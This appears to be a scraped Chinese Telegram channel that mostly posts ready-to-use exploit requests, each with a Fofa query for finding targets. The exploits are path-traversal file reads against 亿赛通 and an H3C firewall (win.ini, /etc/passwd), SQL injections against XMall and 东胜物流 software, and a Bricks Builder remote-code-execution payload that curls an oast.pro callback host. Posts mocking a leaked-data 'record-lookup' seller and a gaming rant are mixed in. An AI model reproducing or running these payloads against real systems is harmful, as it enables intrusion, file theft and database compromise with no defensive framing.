踹哈公寓 – Telegram
亿赛通 Electronic Document Security Management System: ClientAjax arbitrary file download

noscript="电子文档安全管理系统"

POST /CDGServer3/ClientAjax HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br

command=downclientpak&InstallationPack=../../../../../../../../../../windows/win.ini&forward=index.jsp
Forwarded from Sydney的自留地
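"On How a Record-Lookup Mule Hypes Himself"

Note:
These are preliminary findings and may be updated at any time.


The channel was created on February 4, 2024, and the content was posted on February 8 (on the 20th it also claimed that the channel had already been handed over, see Figure 2). Then on the 20th it started posting sentimental little essays, while breaking out to a wider audience through a Bilibili video and happily gaining real human traffic. (Why say 15 years old? Because a social-engineering-database channel posted a household registration record claiming it was his. Whether that is real doesn't matter, but rest assured, I won't show it on screen.)

The video's content is like reciting a menu: it rattles off what was leaked while showing everyone the sentimental little essays and rants the channel posted at the time.

Summary:
The data had been circulating widely long ago
The story seems freshly made up
The traffic is genuinely funneled in
The USDT collected is the real thing


Closing:
Just watch it for fun. If you actually spent USDT, all I can say is that you came to TG to pay tuition; that lousy channel is now frantically forwarding all kinds of record-lookup ads. (Figure 1)

Rather than begging for the archive password, check whether your graphics card is powerful enough and see whether you can use the GPU to run the password; if it still hasn't come out after more than 7 days, you can wash up and go to bed!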
Forwarded from Sydney的自留地
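Staunchly insists he isn't here to advertise 😋

Figure 1: fine, we can say you were just sharing a script.

Then can you explain what exactly is going on in Figure 2? Why are you frantically forwarding your peers' services and channels? 😋

The one whose popularity got leeched posted a video, so how come you went soft and deleted all the forwarded ads?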
[Elden Ring: Shadow of the Erdtree, first trailer - Bilibili] https://b23.tv/NdS8yGH
Which group member's machine is this? Quite a rich inventory 🤣
XMall open-source mall SQL injection vulnerability (CVE-2024-24112)

Fofa:app="XMall-后台管理系统"

GET /item/list?draw=1&order[0][column]=1&order[0][dir]=desc)a+union+select+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e),1)%23;&start=0&length=1&search[value]=&search[regex]=false&cid=-1&_=1679041197136 HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=B37FC1C79B186EB92EE17EA23D316B09; Hm_lvt_90194188523e0a2d04ad3ad170c83f30=1708396293; Hm_lpvt_90194188523e0a2d04ad3ad170c83f30=1708396293
Upgrade-Insecure-Requests: 1
WordPress Bricks Builder remote command execution vulnerability (CVE-2024-25600)

fofa:body="/wp-content/themes/bricks/"

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101 Firefox/96.0
Connection: close
Accept-Encoding: gzip, deflate

Obtain the nonce value

Step 2: execute the RCE

POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Connection: close
Content-Length: 401
Content-Type: application/json
Accept-Encoding: gzip, deflate

{ "postId": "1",  "nonce": "c5b5949**", "element": { "name": "container", "settings": { "hasLoop": "true", "query": { "useQueryEditor": true, "queryEditor": "ob_start();echo curl cnc4ej5blq62an78ck6giyhcffmdr5t56.oast.pro;$output=ob_get_contents();ob_end_clean();throw new Exception($output);", "objectType": "post" } } }}
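Ultimate lag

The opponent slides around through thin air; dual cross naginatas with a hitbox that long, poking point-blank, take off no health, and then I inexplicably eat delayed slashes, getting hit over and over from miles away like the place is damn well haunted

Getting counter-killed like this makes me so angry I won't be able to sleep tonight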
Forwarded from 黄豆
H3C next-generation firewall arbitrary file read vulnerability

product="H3C-下一代防火墙"

/webui/?g=sys_corefile_sysinfo_download&file_name=../../../etc/passwd
东胜物流软件 (logistics software): SQL injection vulnerability in the SaveUserQuerySetting interface

POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-input
Channel name was changed to «倭是出生大玉🤓»